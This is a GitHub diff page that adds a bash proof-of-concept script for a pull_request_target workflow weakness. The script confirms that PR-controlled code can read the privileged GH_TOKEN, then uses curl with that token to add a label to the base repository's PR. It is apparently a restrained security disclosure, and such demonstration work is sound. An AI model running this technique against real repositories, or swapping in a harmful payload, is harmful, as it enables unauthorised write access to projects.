File tree Expand file tree Collapse file tree 1 file changed +21
-0
lines changed Expand file tree Collapse file tree 1 file changed +21
-0
lines changed Original file line number Diff line number Diff line change 1+ #! /usr/bin/env bash
2+ set -euo pipefail
3+
4+ echo " [PoC] Running PR-controlled code inside pull_request_target context."
5+
6+ # Prove we can touch the privileged token (without leaking it)
7+ if [[ -n " ${GH_TOKEN:- } " ; then
8+ echo " [PoC] GH_TOKEN present. Length: ${# GH_TOKEN} "
9+ else
10+ echo " [PoC] GH_TOKEN is NOT present" && exit 1
11+ fi
12+
13+ # Use that token to WRITE to the base repo (label this PR)
14+ echo " [PoC] Adding label 'poc-exploit' to PR #${PR_NUMBER} on ${REPO} ..."
15+ curl -sS -X POST \
16+ -H " Authorization: Bearer ${GH_TOKEN} "
17+ -H " Accept: application/vnd.github+json"
18+ " https://api.github.com/repos/${REPO} /issues/${PR_NUMBER} /labels"
19+ -d ' {"labels":["poc-exploit"]}' > /dev/null
20+
21+ echo " [PoC] Done. Check the PR labels — if you see 'poc-exploit', PR code used a powerful token."
You can’t perform that action at this time.
0 commit comments